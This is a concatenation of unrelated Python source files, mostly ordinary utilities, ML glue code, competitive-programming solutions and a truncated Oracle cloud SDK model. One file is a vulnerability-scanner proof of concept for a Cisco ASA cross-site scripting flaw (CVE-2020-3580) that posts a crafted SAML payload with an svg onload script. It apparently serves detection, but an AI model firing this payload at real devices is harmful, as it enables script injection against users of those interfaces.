for entry_point in pkg_resources.iter_entry_points('stratus_package_templates'):
models[entry_point.name] = entry_point.load()
return models
class PackageTemplate(object):
def __init__(self):
self.parser = None
self.subcommand = None
self.opts = Namespace()
self.args = []
def configure_parser(self, action):
self.parser = argparse.ArgumentParser()
subparsers = self.parser.add_subparsers(help='template commands', dest='template')
customizer = getattr(self, f"customize_parser_{action}", lambda x: x)
self.subcommand = subparsers.add_parser(action)
customizer(self.parser)
def run_parser(self, args):
self.opts = self.parser.parse_args(args)
|
"""
Chef Two and Chef Ten are playing a game with a number X.
In one turn, they can multiply X by 2. The goal of the game is to make X divisible by 10.
Help the Chefs find the smallest number of turns necessary to win the game
(it may be possible to win in zero turns) or determine that it is impossible.
Input
The first line of the input contains a single integer T denoting the number of test cases. The description of T test cases follows.
The first and only line of each test case contains a single integer denoting the initial value of X.
Output
For each test case, print a single line containing one integer — the minimum required number of turns or −1 if there is no way to win the game.
Constraints
1≤T≤1000
0≤X≤109
Subtasks
Subtask #1 (100 points): original constraints
Example Input
3
10
25
1
Example Output
0
1
-1
"""
# cook your dish here
x = int(input())
for i in range(x):
n = int(input())
if n % 10 ==0 :
print('0')
elif n%5 ==0 :
print('1')
else :
print('-1')
|
#
# Copyright 2016 The BigDL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Union, Dict, Any
import intel_extension_for_pytorch as ipex
import torch
import pytorch_lightning as pl
from pytorch_lightning.plugins import SingleDevicePlugin
from pytorch_lightning.accelerators.accelerator import Accelerator
from pytorch_lightning.plugins.training_type import TrainingTypePlugin
from pytorch_lightning.plugins.precision import PrecisionPlugin
from bigdl.nano.utils.log4Error import invalidInputError
_STEP_OUTPUT_TYPE = Union[torch.Tensor, Dict[str, Any]]
class IPEXAccelerator(Accelerator):
def __init__(
self,
training_type_plugin: TrainingTypePlugin = SingleDevicePlugin(
torch.device('cpu')),
enable_bf16=False,
) -> None:
"""
Args:
precision_plugin: the plugin to handle precision-specific parts
training_type_plugin: the plugin to handle different training routines
"""
self.enable_bf16 = enable_bf16
super().__init__(precision_plugin=PrecisionPlugin(),
training_type_plugin=training_type_plugin)
def setup(self, trainer: "pl.Trainer", model: "pl.LightningModule") -> None:
"""
Setup plugins for the trainer fit and creates optimizers.
Args:
trainer: the trainer instance
model: the LightningModule
"""
self.setup_training_type_plugin(model)
if not self.training_type_plugin.setup_optimizers_in_pre_dispatch:
self.setup_optimizers(trainer)
self.setup_precision_plugin()
if len(self.optimizers) > 1:
invalidInputError("IPEX does not support more than one optimizers.")
dtype = torch.bfloat16 if self.enable_bf16 else None
model, optimizer = ipex.optimize(model, optimizer=self.optimizers[0],
inplace=True, dtype=dtype)
self.optimizers = [optimizer]
|
from wsgiref.simple_server import make_server
bytes = chr(100)*1024*1024
def req(environ, start_response):
start_response('200 OK', [])
yield bytes
server = make_server('localhost', 8000, req)
server.serve_forever()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This module contains common function for FARS parsers
"""
def value_by_mapping(value, year, mapping):
if value == -1:
return 'UNKNOWN'
default = mapping['default']
all_keys = mapping.keys()
all_keys.remove('default')
all_keys.sort()
from_year = 0
for i in xrange(0, len(all_keys)):
if year >= all_keys[i]:
from_year = all_keys[i]
if from_year == 0:
return 'UNKNOWN'
branch = mapping[from_year]
if value in branch:
return branch[value]
else:
return default
def get_int(list_row, index):
return int(get_float(list_row, index))
def get_float(list_row, index):
if index < 0 or index > len(list_row) - 1:
return -1.0
if list_row[index] == '.':
return -1.0
else:
return float(list_row[index])
def get_str(list_row, index):
if index < 0 or index > len(list_row) - 1:
return 'UNKNOWN'
else:
return list_row[index]
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Cisco ASA XSS''',
"description": '''Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.''',
"severity": "medium",
"references": [
"https://nvd.nist.gov/vuln/detail/CVE-2020-3580",
"https://twitter.com/ptswarm/status/1408050644460650502"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"cvss-score": "",
"cve-id": "CVE-2020-3580",
"cwe-id": "CWE-79"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2020", "xss", "cisco"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/+CSCOE+/saml/sp/acs?tgname=a"""
method = "POST"
data = """SAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E"""
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""<svg/onload=alert(/{{randstr}}/)>""" in resp0.text) and (resp0.status_code == 200) and ("""text/html""" in str(resp0.headers)):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
|
"""
Status information for the CI infrastructure, for use by the dashboard.
"""
import threading
import time
import traceback
import StringIO
from llvmlab import util
import buildbot.statusclient
class BuildStatus(util.simple_repr_mixin):
@staticmethod
def fromdata(data):
version = data['version']
if version not in (0, 1):
raise ValueError, "Unknown version"
if version == 0:
slave = None
else:
slave = data['slave']
return BuildStatus(data['name'], data['number'], data['source_stamp'],
data['result'], data['start_time'], data['end_time'],
slave)
def todata(self):
return { 'version' : 1,
'name' : self.name,
'number' : self.number,
'source_stamp' : self.source_stamp,
'result' : self.result,
'start_time' : self.start_time,
'end_time' : self.end_time,
'slave' : self.slave }
def __init__(self, name, number, source_stamp,
result, start_time, end_time, slave):
self.name = name
self.number = number
self.source_stamp = source_stamp
self.result = result
self.start_time = start_time
self.end_time = end_time
self.slave = slave
class StatusMonitor(threading.Thread):
def __init__(self, app, status):
threading.Thread.__init__(self)
self.daemon = True
self.app = app
self.status = status
def run(self):
while 1:
try:
self.read_events()
except:
# Log this failure.
os = StringIO.StringIO()
print >>os, "*** ERROR: failure in buildbot monitor"
print >>os, "\n-- Traceback --"
traceback.print_exc(file = os)
self.app.logger.error(os.getvalue())
# Sleep for a while, then restart.
time.sleep(60)
def read_events(self):
# Constantly read events from the status client.
while 1:
for event in self.status.statusclient.pull_events():
# Log the event (for debugging).
self.status.event_log.append((time.time(), event))
self.status.event_log = self.status.event_log[-100:]
kind = event[0]
if kind == 'added_builder':
name = event[1]
if name not in self.status.builders:
self.status.builders[name] = []
self.status.build_map[name] = {}
elif kind == 'removed_builder':
name = event[1]
if name in self.status.builders:
self.status.builders.pop(name)
self.status.build_map.pop(name)
elif kind == 'reset_builder':
name = event[1]
self.status.builders[name] = []
self.status.build_map[name] = {}
elif kind == 'invalid_build':
_,name,id = event
build = self.status.build_map[name].get(id)
if build is not None:
self.status.builders[name].remove(build)
self.status.build_map[name].pop(id)
elif kind in ('add_build', 'completed_build'):
_,name,id = event
build = self.status.build_map[name].get(id)
add_build = False
if build is None:
add_build = True
build = BuildStatus(name, id, None, None, None, None,
None)
# Get the build information.
try:
res = self.status.statusclient.get_json_result((
'builders', name, 'builds', str(build.number)))
except:
res = None
if res:
build.result = res['results']
if 'sourceStamps' in res:
build.source_stamp = res['sourceStamps'][0]['revision']
else:
build.source_stamp = res['sourceStamp']['revision']
build.start_time = res['times'][0]
build.end_time = res['times'][1]
build.slave = res['slave']
if add_build:
# Add to the builds list, maintaining order.
self.status.build_map[name][id] = build
builds = self.status.builders[name]
builds.append(build)
if (len(builds) > 1 and
build.number < builds[-2].number):
builds.sort(key = lambda b: b.number)
else:
self.app.logger.warning("unknown event '%r'" % (event,))
# FIXME: Don't save this frequently, we really just want to
# checkpoint and make sure we save on restart.
self.app.save_status()
time.sleep(.1)
class Status(util.simple_repr_mixin):
@staticmethod
def fromdata(data):
version = data['version']
if version != 0:
raise ValueError, "Unknown version"
sc = data.get('statusclient')
if sc:
sc = buildbot.statusclient.StatusClient.fromdata(sc)
return Status(data['master_url'],
dict((name, [BuildStatus.fromdata(b)
for b in builds])
for name,builds in data['builders']),
sc)
def todata(self):
return { 'version' : 0,
'master_url' : self.master_url,
'builders' : [(name, [b.todata()
for b in builds])
for name,builds in self.builders.items()],
'statusclient' : self.statusclient.todata() }
def __init__(self, master_url, builders, statusclient = None):
self.master_url = master_url
self.builders = builders
if statusclient is None and master_url:
statusclient = buildbot.statusclient.StatusClient(master_url)
self.statusclient = statusclient
# Transient data.
self.event_log = []
self.build_map = dict((name, dict((b.number, b)
for b in builds))
for name,builds in self.builders.items())
def start_monitor(self, app):
if self.statusclient:
self.statusclient.logger = app.logger
monitor = StatusMonitor(app, self)
monitor.start()
return monitor
|
from rest_framework import viewsets, mixins
from ..models import SparePartType
from ..serializers import sparepart_types
class SparePartTypeViewSet(mixins.CreateModelMixin,
mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.ListModelMixin,
viewsets.GenericViewSet):
serializer_class = sparepart_types.SparePartTypeSerializer
queryset = SparePartType.objects.all()
ordering_fields = '__all__'
ordering = ['created']
filterset_fields = ['created', 'modified', ]
|
# suppress warnings
import warnings;
warnings.filterwarnings('ignore');
# common imports
import pandas as pd
import numpy as np
import math
import re
import glob
import os
import json
import random
import pprint as pp
import textwrap
import sqlite3
import logging
import spacy
import nltk
from tqdm.auto import tqdm
# register `pandas.progress_apply` and `pandas.Series.map_apply` with `tqdm`
tqdm.pandas()
# pandas display options
# https://pandas.pydata.org/pandas-docs/stable/user_guide/options.html#available-options
pd.options.display.max_columns = 30 # default 20
pd.options.display.max_rows = 60 # default 60
pd.options.display.float_format = '{:.2f}'.format
# pd.options.display.precision = 2
pd.options.display.max_colwidth = 200 # default 50; -1 = all
# otherwise text between $ signs will be interpreted as formula and printed in italic
pd.set_option('display.html.use_mathjax', False)
# np.set_printoptions(edgeitems=3) # default 3
import matplotlib as mpl
from matplotlib import pyplot as plt
plot_params = {'figure.figsize': (8, 4),
'axes.labelsize': 'large',
'axes.titlesize': 'large',
'xtick.labelsize': 'large',
'ytick.labelsize':'large',
'figure.dpi': 200 }
# adjust matplotlib defaults
mpl.rcParams.update(plot_params)
import seaborn as sns
sns.set_style("darkgrid")
|
# Generated by Django 2.1.4 on 2018-12-08 01:28
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('finance', '0014_auto_20181208_0124'),
]
operations = [
migrations.AlterField(
model_name='expense',
name='type',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='finance.ExpenseType'),
),
]
|
import utils.constants
import logging, pytesseract, fitz
import pandas as pd
from pathlib import Path
from PIL import Image
def convert_pages_into_image(input_path, format):
"""Recursively finds all PDF files within a given directory and converts each
page of each PDF to an image using PyMuPDF."""
# To get better resolution
zoom_x = 2.0
zoom_y = 2.0
zoom_matrix = fitz.Matrix(zoom_x, zoom_y)
pdf_file_list = Path(input_path).rglob("*.pdf")
for pdf_file in pdf_file_list:
logging.debug(f"Converting '{pdf_file.resolve()}'.")
doc = fitz.open(pdf_file)
image_name = pdf_file.stem + "_page_"
images_path = utils.constants.converted_dir / "pages-converted-to-images" / pdf_file.stem
Path(images_path).mkdir(parents=True, exist_ok=True)
for page in doc:
logging.debug(f"Image created at '{images_path}/{image_name}{page.number}{format}'.")
pix = page.get_pixmap(matrix=zoom_matrix)
pix.save(f"{images_path}/{image_name}{page.number}{format}")
def ocr_images_for_text_confidence(input_path, format=".png"):
"""Recursively finds all images of the given format and performs OCR on them
to create a text file containing the infomation that was found."""
input_path = Path(input_path).resolve()
for directory in input_path.iterdir():
if directory.name == "pages-converted-to-images":
for sub_dir in directory.iterdir():
images_file_list = sorted(Path(sub_dir).rglob(f"*{format}"))
for item in images_file_list:
split_name = item.name.split("_page_")
txt_file_path = Path(f"{utils.constants.confidence_dir}/{sub_dir.name}/{split_name[0]}-IMAGE-OCR.txt").resolve()
txt_file_path.parent.mkdir(parents=True, exist_ok=True)
logging.debug(f"Performing OCR on '{item.resolve()}'.")
logging.debug(f"Creating text output file at '{txt_file_path}'.")
ocr_string = pytesseract.image_to_string(Image.open(item))
with open(txt_file_path, "a") as stream:
stream.write(ocr_string)
def extract_text_from_pdf_confidence(input_path):
"""Extracts all text from all found PDF files using PyMuPDF for the
confidence check"""
input_path = Path(input_path).resolve()
pdf_file_list = sorted(Path(input_path).rglob(f"*.pdf"))
for pdf in pdf_file_list:
txt_file_path = Path(f"{utils.constants.confidence_dir}/{pdf.stem}/{pdf.stem}-PYMUPDF-TXT.txt").resolve()
txt_file_path.parent.mkdir(parents=True, exist_ok=True)
logging.debug(f"Extracting text from '{pdf.resolve()}'.")
logging.debug(f"Creating text output file at '{txt_file_path}'.")
with fitz.open(pdf) as doc:
pdf_text = ""
for page in doc:
pdf_text += page.get_text()
with open(txt_file_path, "a") as stream:
stream.write(pdf_text)
def extract_images_from_pdf(input_path):
"""Extracts all images from all found PDF files using PyMuPDF."""
input_path = Path(input_path).resolve()
pdf_file_list = sorted(Path(input_path).rglob(f"*.pdf"))
for pdf in pdf_file_list:
doc = fitz.open(pdf)
image_dir = Path(f"{utils.constants.extracted_dir}/{pdf.stem}/extracted-images").resolve()
image_dir.mkdir(parents=True, exist_ok=True)
for page in range(len(doc)):
for img in doc.get_page_images(page):
xref = img[0]
pix = fitz.Pixmap(doc, xref)
if pix.n - pix.alpha < 4:
# this is GRAY or RGB
pix.save(f"{image_dir}/p{page}-{xref}.png")
else:
# CMYK: convert to RGB first
pix1 = fitz.Pixmap(fitz.csRGB, pix)
pix1.save(f"{image_dir}/p{page}-{xref}.png")
pix1 = None
pix = None
|
import argparse
import re
import requests
from colorama import Fore, Style
from bs4 import BeautifulSoup
import pandas as pd
from gamestonk_terminal.helper_funcs import (
check_positive,
get_user_agent,
patch_pandas_text_adjustment,
parse_known_args_and_warn,
)
from gamestonk_terminal.config_terminal import USE_COLOR
def buy_sell_ratio_color_red_green(val: str) -> str:
buy_sell_match = re.match(r"(\d+)% Buys, (\d+)% Sells", val, re.M | re.I)
if not buy_sell_match:
return val
buys = int(buy_sell_match.group(1))
sells = int(buy_sell_match.group(2))
if buys >= sells:
return "{}{}%{} Buys, {}% Sells".format(
Fore.GREEN, buys, Style.RESET_ALL, sells
)
return f"{buys}% Buys, {Fore.RED}{sells}%{Style.RESET_ALL} Sells"
def price_change_color_red_green(val: str) -> str:
val_float = float(val.split(" ")[0])
if val_float > 0:
color = Fore.GREEN
else:
color = Fore.RED
return color + val + Style.RESET_ALL
def orders(l_args):
parser = argparse.ArgumentParser(
add_help=False,
prog="orders",
description="""
Orders by Fidelity customers. Information shown in the table below
is based on the volume of orders entered on the "as of" date shown. Securities
identified are not recommended or endorsed by Fidelity and are displayed for
informational purposes only. [Source: Fidelity]
""",
)
parser.add_argument(
"-n",
"--num",
action="store",
dest="n_num",
type=check_positive,
default=10,
help="Number of top ordered stocks to be printed.",
)
ns_parser = parse_known_args_and_warn(parser, l_args)
if not ns_parser:
return
url_orders = (
"https://eresearch.fidelity.com/eresearch/gotoBL/fidelityTopOrders.jhtml"
)
text_soup_url_orders = BeautifulSoup(
requests.get(url_orders, headers={"User-Agent": get_user_agent()}).text, "lxml"
)
l_orders = list()
l_orders_vals = list()
idx = 0
order_list = text_soup_url_orders.findAll(
"td",
{"class": ["second", "third", "fourth", "fifth", "sixth", "seventh", "eight"]},
)
for an_order in order_list:
if ((idx + 1) % 3 == 0) or ((idx + 1) % 4 == 0) or ((idx + 1) % 6 == 0):
if not an_order:
l_orders_vals.append("")
else:
l_orders_vals.append(an_order.contents[1])
elif (idx + 1) % 5 == 0:
s_orders = str(an_order)
l_orders_vals.append(
s_orders[
s_orders.find('title="') + len('title="') : s_orders.find('"/>')
]
)
else:
l_orders_vals.append(an_order.text.strip())
idx += 1
# Add value to dictionary
if (idx + 1) % 8 == 0:
l_orders.append(l_orders_vals)
l_orders_vals = list()
idx = 0
df_orders = pd.DataFrame(
l_orders,
columns=[
"Symbol",
"Company",
"Price Change",
"# Buy Orders",
"Buy / Sell Ratio",
"# Sell Orders",
"Latest News",
],
)
df_orders = df_orders[
[
"Symbol",
"Buy / Sell Ratio",
"Price Change",
"Company",
"# Buy Orders",
"# Sell Orders",
"Latest News",
]
]
print(
text_soup_url_orders.findAll("span", {"class": "source"})[0].text.capitalize()
+ ":"
)
pd.set_option("display.max_colwidth", None)
if USE_COLOR:
df_orders["Buy / Sell Ratio"] = df_orders["Buy / Sell Ratio"].apply(
buy_sell_ratio_color_red_green
)
df_orders["Price Change"] = df_orders["Price Change"].apply(
price_change_color_red_green
)
patch_pandas_text_adjustment()
print(df_orders.head(n=ns_parser.n_num).iloc[:, :-1].to_string(index=False))
print("")
|
n = int(input())
s = {}
for i in range(n):
w, h = [int(x) for x in input().split()]
if not w in s or h > s[w]:
s[w] = h
print(sum(s.values()))
|
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class CreateLoadBalancerDetails(object):
"""
The configuration details for creating a load balancer.
**Warning:** Oracle recommends that you avoid using any confidential information when you supply string values using the API.
"""
#: A constant which can be used with the ip_mode property of a CreateLoadBalancerDetails.
#: This constant has a value of "IPV4"
IP_MODE_IPV4 = "IPV4"
#: A constant which can be used with the ip_mode property of a CreateLoadBalancerDetails.
#: This constant has a value of "IPV6"
IP_MODE_IPV6 = "IPV6"
def __init__(self, **kwargs):
"""
Initializes a new CreateLoadBalancerDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param compartment_id:
The value to assign to the compartment_id property of this CreateLoadBalancerDetails.
:type compartment_id: str
:param display_name:
The value to assign to the display_name property of this CreateLoadBalancerDetails.
:type display_name: str
:param shape_name:
The value to assign to the shape_name property of this CreateLoadBalancerDetails.
:type shape_name: str
:param shape_details:
The value to assign to the shape_details property of this CreateLoadBalancerDetails.
:type shape_details: oci.load_balancer.models.ShapeDetails
:param is_private:
The value to assign to the is_private property of this CreateLoadBalancerDetails.
:type is_private: bool
:param ip_mode:
The value to assign to the ip_mode property of this CreateLoadBalancerDetails.
Allowed values for this property are: "IPV4", "IPV6"
:type ip_mode: str
:param reserved_ips:
The value to assign to the reserved_ips property of this CreateLoadBalancerDetails.
:type reserved_ips: list[oci.load_balancer.models.ReservedIP]
:param listeners:
The value to assign to the listeners property of this CreateLoadBalancerDetails.
:type listeners: dict(str, ListenerDetails)
:param hostnames:
The value to assign to the hostnames property of this CreateLoadBalancerDetails.
:type hostnames: dict(str, HostnameDetails)
:param backend_sets:
The value to assign to the backend_sets property of this CreateLoadBalancerDetails.
:type backend_sets: dict(str, BackendSetDetails)
:param network_security_group_ids:
The value to assign to the network_security_group_ids property of this CreateLoadBalancerDetails.
:type network_security_group_ids: list[str]
:param subnet_ids:
The value to assign to the subnet_ids property of this CreateLoadBalancerDetails.
:type subnet_ids: list[str]
:param certificates:
The value to assign to the certificates property of this CreateLoadBalancerDetails.
:type certificates: dict(str, CertificateDetails)
:param ssl_cipher_suites:
The value to assign to the ssl_cipher_suites property of this CreateLoadBalancerDetails.
:type ssl_cipher_suites: dict(str, SSLCipherSuiteDetails)
:param path_route_sets:
The value to assign to the path_route_sets property of this CreateLoadBalancerDetails.
:type path_route_sets: dict(str, PathRouteSetDetails)
:param freeform_tags:
The value to assign to the freeform_tags property of this CreateLoadBalancerDetails.
:type freeform_tags: dict(str, str)
:param defined_tags:
The value to assign to the defined_tags property of this CreateLoadBalancerDetails.
:type defined_tags: dict(str, dict(str, object))
:param rule_sets:
The value to assign to the rule_sets property of this CreateLoadBalancerDetails.
:type rule_sets: dict(str, RuleSetDetails)
"""
self.swagger_types = {
'compartment_id': 'str',
'display_name': 'str',
'shape_name': 'str',
'shape_details': 'ShapeDetails',
'is_private': 'bool',
'ip_mode': 'str',
'reserved_ips': 'list[ReservedIP]',
'listeners': 'dict(str, ListenerDetails)',
'hostnames': 'dict(str, HostnameDetails)',
'backend_sets': 'dict(str, BackendSetDetails)',
'network_security_group_ids': 'list[str]',
'subnet_ids': 'list[str]',
'certificates': 'dict(str, CertificateDetails)',
'ssl_cipher_suites': 'dict(str, SSLCipherSuiteDetails)',
'path_route_sets': 'dict(str, PathRouteSetDetails)',
'freeform_tags': 'dict(str, str)',
'defined_tags': 'dict(str, dict(str, object))',
'rule_sets': 'dict(str, RuleSetDetails)'
}
self.attribute_map = {
'compartment_id': 'compartmentId',
'display_name': 'displayName',
'shape_name': 'shapeName',
'shape_details': 'shapeDetails',
'is_private': 'isPrivate',
'ip_mode': 'ipMode',
'reserved_ips': 'reservedIps',
'listeners': 'listeners',
'hostnames': 'hostnames',
'backend_sets': 'backendSets',
'network_security_group_ids': 'networkSecurityGroupIds',
'subnet_ids': 'subnetIds',
'certificates': 'certificates',
'ssl_cipher_suites': 'sslCipherSuites',
'path_route_sets': 'pathRouteSets',
'freeform_tags': 'freeformTags',
'defined_tags': 'definedTags',
'rule_sets': 'ruleSets'
}
self._compartment_id = None
self._display_name = None
self._shape_name = None
self._shape_details = None
self._is_private = None
self._ip_mode = None
self._reserved_ips = None
self._listeners = None
self._hostnames = None
self._backend_sets = None
self._network_security_group_ids = None
self._subnet_ids = None
self._certificates = None
self._ssl_cipher_suites = None
self._path_route_sets = None
self._freeform_tags = None
self._defined_tags = None
self._rule_sets = None
@property
def compartment_id(self):
"""
**[Required]** Gets the compartment_id of this CreateLoadBalancerDetails.
The `OCID`__ of the compartment in which to create the load balancer.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The compartment_id of this CreateLoadBalancerDetails.
:rtype: str
"""
return self._compartment_id
@compartment_id.setter
def compartment_id(self, compartment_id):
"""
Sets the compartment_id of this CreateLoadBalancerDetails.
The `OCID`__ of the compartment in which to create the load balancer.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param compartment_id: The compartment_id of this CreateLoadBalancerDetails.
:type: str
"""
self._compartment_id = compartment_id
@property
def display_name(self):
"""
**[Required]** Gets the display_name of this CreateLoadBalancerDetails.
A user-friendly name. It does not have to be unique, and it is changeable.
Avoid entering confidential information.
Example: `example_load_balancer`
:return: The display_name of this CreateLoadBalancerDetails.
:rtype: str
"""
return self._display_name
@display_name.setter
def display_name(self, display_name):
"""
Sets the display_name of this CreateLoadBalancerDetails.
A user-friendly name. It does not have to be unique, and it is changeable.
Avoid entering confidential information.
Example: `example_load_balancer`
:param display_name: The display_name of this CreateLoadBalancerDetails.
:type: str
"""
self._display_name = display_name
@property
def shape_name(self):
"""
**[Required]** Gets the shape_name of this CreateLoadBalancerDetails.
A template that determines the total pre-provisioned bandwidth (ingress plus egress).
To get a list of available shapes, use the :func:`list_shapes`
operation.
Example: `100Mbps`
:return: The shape_name of this CreateLoadBalancerDetails.
:rtype: str
"""
return self._shape_name
@shape_name.setter
def shape_name(self, shape_name):
"""
Sets the shape_name of this CreateLoadBalancerDetails.
A template that determines the total pre-provisioned bandwidth (ingress plus egress).
To get a list of available shapes, use the :func:`list_shapes`
operation.
Example: `100Mbps`
:param shape_name: The shape_name of this CreateLoadBalancerDetails.
:type: str
"""
self._shape_name = shape_name
@property
def shape_details(self):
"""
Gets the shape_details of this CreateLoadBalancerDetails.
The configuration details to create load balancer using Flexible shape. This is required only if shapeName is `Flexible`.
:return: The shape_details of this CreateLoadBalancerDetails.
:rtype: oci.load_balancer.models.ShapeDetails
"""
return self._shape_details
@shape_details.setter
def shape_details(self, shape_details):
"""
Sets the shape_details of this CreateLoadBalancerDetails.
The configuration details to create load balancer using Flexible shape. This is required only if shapeName is `Flexible`.
:param shape_details: The shape_details of this CreateLoadBalancerDetails.
:type: oci.load_balancer.models.ShapeDetails
"""
self._shape_details = shape_details
@property
def is_private(self):
"""
Gets the is_private of this CreateLoadBalancerDetails.
Whether the load balancer has a VCN-local (private) IP address.
If \"true\", the service assigns a private IP address to the load balancer.
If \"false\", the service assigns a public IP address to the load balancer.
A public load balancer is accessible from the internet, depending on your VCN's
`security list rules`__. For more information about public and
private load balancers, see `How Load Balancing Works`__.
Example: `true`
__ https://docs.cloud.oracle.com/Content/Network/Concepts/securitylists.htm
__ https://docs.cloud.oracle.com/Content/Balance/Concepts/balanceoverview.htm#how-load-balancing-works
:return: The is_private of this CreateLoadBalancerDetails.
:rtype: bool
"""
return self._is_private
@is_private.setter
def is_private(self, is_private):
"""
Sets the is_private of this CreateLoadBalancerDetails.
Whether the load balancer has a VCN-local (private) IP address.
If \"true\", the service assigns a private IP address to the load balancer.
If \"false\", the service assigns a public IP address to the load balancer.
A public load balancer is accessible from the internet, depending on your VCN's
`security list rules`__. For more information about public and
private load balancers, see `How Load Balancing Works`__.
Example: `true`
__ https://docs.cloud.oracle.com/Content/Network/Concepts/securitylists.htm
__ https://docs.cloud.oracle.com/Content/Balance/Concepts/balanceoverview.htm#how-load-balancing-works
:param is_private: The is_private of this CreateLoadBalancerDetails.
:type: bool
"""
self._is_private = is_private
@property
def ip_mode(self):
"""
Gets the ip_mode of this CreateLoadBalancerDetails.
Whether the load balancer has an IPv4 or IPv6 IP address.
If \"IPV4\", the service assigns an IPv4 address and the load balancer supports IPv4 traffic.
If \"IPV6\", the service assigns an IPv6 address and the load balancer supports IPv6 traffic.
Example: \"ipMode\":\"IPV6\"
Allowed values for this property are: "IPV4", "IPV6"
:return: The ip_mode of this CreateLoadBalancerDetails.
:rtype: str
"""
return self._ip_mode
@ip_mode.setter
def ip_mode(self, ip_mode):
"""
Sets the ip_mode of this CreateLoadBalancerDetails.
Whether the load balancer has an IPv4 or IPv6 IP address.
If \"IPV4\", the service assigns an IPv4 address and the load balancer supports IPv4 traffic.
If \"IPV6\", the service assigns an IPv6 address and the load balancer supports IPv6 traffic.
Example: \"ipMode\":\"IPV6\"
:param ip_mode: The ip_mode of this CreateLoadBalancerDetails.
:type: str
"""
allowed_values = ["IPV4", "IPV6"]
if not value_allowed_none_or_none_sentinel(ip_mode, allowed_values):
raise ValueError(
"Invalid value for `ip_mode`, must be None or one of {0}"
.format(allowed_values)
)
self._ip_mode = ip_mode
@property
def reserved_ips(self):
"""
Gets the reserved_ips of this CreateLoadBalancerDetails.
An array of reserved Ips.
:return: The reserved_ips of this CreateLoadBalancerDetails.
:rtype: list[oci.load_balancer.models.ReservedIP]
"""
return self._reserved_ips
@reserved_ips.setter
def reserved_ips(self, reserved_ips):
"""
Sets the reserved_ips of this CreateLoadBalancerDetails.
An array of reserved Ips.
:param reserved_ips: The reserved_ips of this CreateLoadBalancerDetails.
:type: list[oci.load_balancer.models.ReservedIP]
"""
self._reserved_ips = reserved_ips
@property
def listeners(self):
"""
Gets the listeners of this CreateLoadBalancerDetails.
:return: The listeners of this CreateLoadBalancerDetails.
:rtype: dict(str, ListenerDetails)
"""
return self._listeners
@listeners.setter
def listeners(self, listeners):
"""
Sets the listeners of this CreateLoadBalancerDetails.
:param listeners: The listeners of this CreateLoadBalancerDetails.
:type: dict(str, ListenerDetails)
"""
self._listeners = listeners
@property
def hostnames(self):
"""
Gets the hostnames of this CreateLoadBalancerDetails.
:return: The hostnames of this CreateLoadBalancerDetails.
:rtype: dict(str, HostnameDetails)
"""
return self._hostnames
@hostnames.setter
def hostnames(self, hostnames):
"""
Sets the hostnames of this CreateLoadBalancerDetails.
:param hostnames: The hostnames of this CreateLoadBalancerDetails.
:type: dict(str, HostnameDetails)
"""
self._hostnames = hostnames
@property
def backend_sets(self):
"""
Gets the backend_sets of this CreateLoadBalancerDetails.
:return: The backend_sets of this CreateLoadBalancerDetails.
:rtype: dict(str, BackendSetDetails)
"""
return self._backend_sets
@backend_sets.setter
def backend_sets(self, backend_sets):
"""
Sets the backend_sets of this CreateLoadBalancerDetails.
:param backend_sets: The backend_sets of this CreateLoadBalancerDetails.
:type: dict(str, BackendSetDetails)
"""
self._backend_sets = backend_sets
@property
def network_security_group_ids(self):
"""
Gets the network_security_group_ids of this CreateLoadBalancerDetails.
An array of NSG `OCIDs`__ associated with this load balancer.
During the load balancer's creation, the service adds the new load balancer to the specified NSGs.
The benefits of using NSGs with the load balancer include:
* NSGs define network security rules to govern ingress and egress traffic for the load balancer.
* The network security rules of other resources can reference the NSGs associated with the load balancer
to ensure access.
Example: `[\"ocid1.nsg.oc1.phx.unique_ID\"]`
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The network_security_group_ids of this CreateLoadBalancerDetails.
:rtype: list[str]
